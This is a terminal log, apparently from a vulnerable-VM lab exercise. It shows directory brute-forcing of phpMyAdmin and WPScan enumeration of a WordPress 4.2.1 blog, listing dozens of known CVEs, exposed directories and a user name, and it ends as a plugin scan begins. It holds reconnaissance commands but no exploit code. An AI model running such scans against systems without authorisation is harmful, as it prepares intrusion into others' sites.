==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/sv/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/tr/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/uk/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/vi/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/zh_CN/                                             
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/zh_TW/                                             
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/sql/ ----
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/templates/ ----
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/components/                                     
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/database/                                       
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/error/                                          
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/javascript/                                     
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/list/                                           
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/navigation/                                     
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/table/                                          
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/test/                                           
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/themes/ ----
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/themes/original/                                          
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/doc/html/ ----
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/doc/html/_static/                                         
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/js/jquery/ ----
^C> Testing: https://192.168.1.28:12380/phpmyadmin/js/jquery/_    

=============================================================================================================

root@Security-Audit-01:~# wpscan --disable-tls-checks -u https://192.168.1.28:12380/blogblog/
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://192.168.1.28:12380/blogblog/
[+] Started: Sun Jul 22 17:34:12 2018

[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: https://192.168.1.28:12380/blogblog/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: https://192.168.1.28:12380/blogblog/?feed=rss2   [HTTP 200]
[!] Detected 1 user from RSS feed:
+------------+
| Name       |
+------------+
| John Smith |
+------------+
[!] Upload directory has directory listing enabled: https://192.168.1.28:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.28:12380/blogblog/wp-includes/

[+] Enumerating WordPress version ...
[!] The WordPress 'https://192.168.1.28:12380/blogblog/readme.html' file exists exposing a version number

[+] WordPress version 4.2.1 (Released on 2015-04-27) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 55 vulnerabilities identified from the version number

[!] Title: WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7979
    Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8111
    Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
    Reference: https://twitter.com/klikkioy/status/624264122570526720
    Reference: https://klikki.fi/adv/wordpress3.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection 
    Reference: https://wpvulndb.com/vulnerabilities/8126
    Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
    Reference: https://wpvulndb.com/vulnerabilities/8130
    Reference: https://core.trac.wordpress.org/changeset/33536
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8131
    Reference: https://core.trac.wordpress.org/changeset/33529
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8132
    Reference: https://core.trac.wordpress.org/changeset/33541
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8133
    Reference: https://core.trac.wordpress.org/changeset/33549
    Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8186
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8187
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
    Reference: https://wpvulndb.com/vulnerabilities/8188
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8358
    Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8376
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36435
    Reference: https://hackerone.com/reports/110801
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8377
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36444
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7

[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
    Reference: https://wpvulndb.com/vulnerabilities/8473
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
    Reference: https://wpvulndb.com/vulnerabilities/8474
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8475
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5

[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8488
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
    Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2

[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
    Reference: https://wpvulndb.com/vulnerabilities/8489
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
    Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
    Reference: http://avlidienbrunn.com/wp_some_loader.php
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8

[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
    Reference: https://wpvulndb.com/vulnerabilities/8518
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9

[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8519
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
    Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9

[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
    Reference: https://wpvulndb.com/vulnerabilities/8520
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9

[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
    Reference: https://wpvulndb.com/vulnerabilities/8615
    Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
    Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
    Reference: http://seclists.org/fulldisclosure/2016/Sep/6
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10

[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
    Reference: https://wpvulndb.com/vulnerabilities/8616
    Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
    Reference: https://wpvulndb.com/vulnerabilities/8716
    Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
    Reference: https://wpvulndb.com/vulnerabilities/8718
    Reference: https://www.mehmetince.net/low-severity-wordpress/
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
    Reference: https://wpvulndb.com/vulnerabilities/8719
    Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8720
    Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
    Reference: https://wpvulndb.com/vulnerabilities/8721
    Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11

[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
    Reference: https://wpvulndb.com/vulnerabilities/8729
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
    Reference: https://wpvulndb.com/vulnerabilities/8765
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
    Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
    Reference: http://seclists.org/oss-sec/2017/q1/563
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
    Reference: https://wpvulndb.com/vulnerabilities/8766
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13

[!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
    Reference: https://wpvulndb.com/vulnerabilities/8768
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
    Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13

[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
    Reference: https://wpvulndb.com/vulnerabilities/8770
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
    Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
    Reference: http://seclists.org/oss-sec/2017/q1/562
    Reference: https://hackerone.com/reports/153093
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13

[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807
    Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
    Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
    Reference: https://core.trac.wordpress.org/ticket/25239
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295

[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
    Reference: https://wpvulndb.com/vulnerabilities/8815
    Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
[i] Fixed in: 4.2.15

[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
    Reference: https://wpvulndb.com/vulnerabilities/8816
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
[i] Fixed in: 4.2.15

[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks 
    Reference: https://wpvulndb.com/vulnerabilities/8817
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
[i] Fixed in: 4.2.15

[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8818
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
    Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
[i] Fixed in: 4.2.15

[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
    Reference: https://wpvulndb.com/vulnerabilities/8819
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
    Reference: https://hackerone.com/reports/203515
    Reference: https://hackerone.com/reports/203515
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
[i] Fixed in: 4.2.15

[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8820
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
[i] Fixed in: 4.2.15

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8905
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
    Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
[i] Fixed in: 4.2.16

[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
    Reference: https://wpvulndb.com/vulnerabilities/8906
    Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
    Reference: https://wpvulndb.com/vulnerabilities/8905
[i] Fixed in: 4.7.5

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8910
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/41398
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
[i] Fixed in: 4.2.16

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
    Reference: https://wpvulndb.com/vulnerabilities/8911
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/41457
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
[i] Fixed in: 4.2.16

[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
    Reference: https://wpvulndb.com/vulnerabilities/8941
    Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
    Reference: https://twitter.com/ircmaxell/status/923662170092638208
    Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
[i] Fixed in: 4.2.17

[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
    Reference: https://wpvulndb.com/vulnerabilities/8966
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.2.18

[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8967
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.2.18

[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
    Reference: https://wpvulndb.com/vulnerabilities/8969
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.2.18

[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/9006
    Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
    Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/ticket/42720
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
    Reference: https://wpvulndb.com/vulnerabilities/9053
    Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
[i] Fixed in: 4.2.20

[!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
    Reference: https://wpvulndb.com/vulnerabilities/9054
    Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
[i] Fixed in: 4.2.20

[!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
    Reference: https://wpvulndb.com/vulnerabilities/9055
    Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
[i] Fixed in: 4.2.20

[!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
    Reference: https://wpvulndb.com/vulnerabilities/9100
    Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
    Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
    Reference: https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
    Reference: https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
    Reference: https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
[i] Fixed in: 4.2.21

[+] WordPress theme in use: bhost - v1.2.9

[+] Name: bhost - v1.2.9
 |  Last updated: 2018-01-10T00:00:00.000Z
 |  Location: https://192.168.1.28:12380/blogblog/wp-content/themes/bhost/
 |  Readme: https://192.168.1.28:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.4.0
 |  Style URL: https://192.168.1.28:12380/blogblog/wp-content/themes/bhost/style.css
 |  Theme Name: BHost
 |  Theme URI: Author: Masum Billah
 |  Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
 |  Author: Masum Billah
 |  Author URI: http://getmasum.net/

[+] Enumerating plugins from passive detection ...
[+] No plugins found passively

[+] Finished: Sun Jul 22 17:34:16 2018
[+] Elapsed time: 00:00:04
[+] Requests made: 64
[+] Memory used: 51.629 MB

=============================================================================================================

root@Security-Audit-01:~# wpscan --disable-tls-checks --url https://192.168.1.28:12380/blogblog/ --enumerate ap
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
